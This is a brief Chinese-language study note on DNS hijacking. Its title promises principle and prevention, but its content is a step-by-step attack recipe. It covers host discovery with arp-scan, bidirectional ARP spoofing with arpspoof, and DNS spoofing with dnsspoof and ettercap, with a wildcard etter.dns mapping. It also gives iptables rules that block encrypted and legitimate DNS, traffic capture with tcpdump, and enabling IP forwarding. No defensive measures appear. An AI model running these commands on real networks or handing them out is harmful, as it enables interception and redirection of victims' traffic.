DNS劫持

DNS劫持攻击原理与防范

#tech / security #type / concept #status / seed

1.获取 ip mac 地址信息

ip a 得到本机 ip 地址
ip route 得到网关地址
arp-scan --interface=eth0 --localnet 扫描统一子网下主机

2.ARP劫持(成为中间人)

arpspoof -i eth0 -t 目标IP -r 网关IP   # 欺骗目标设备 告诉目标主机,网关ip对应的mac地址是攻击机的mac地址
arpspoof -i eth0 -t 网关IP -r 目标IP   # 欺骗网关(双向劫持)

3.DNS劫持

使用 dnsspoof

dnsspoof -i eth0 -f hosts.txt

使用 ettercap

配置域名映射文件

sudo vim /etc/ettercap/etter.dns

httpforever.com A 39.156.66.10
* A 192.168.65.100

运行命令

ettercap -T -i eth0 -M arp:remote /受害者IP// /网关IP// -P dns_spoof

其他命令

iptables -A FORWARD -p tcp --dport 443 -j DROP # 阻断加密 DNS 
iptables -A FORWARD -p udp --dport 53 -d 192.168.65.2 -j DROP # 阻断合法 DNS 

tcpdump -i eth0 host 192.168.65.2 or host 192.168.65.132 # 获取 tcp 流量
echo 1 > /proc/sys/net/ipv4/ip_forward # 开启 IP 转发
创建于 2025/1/1 更新于 2026/5/27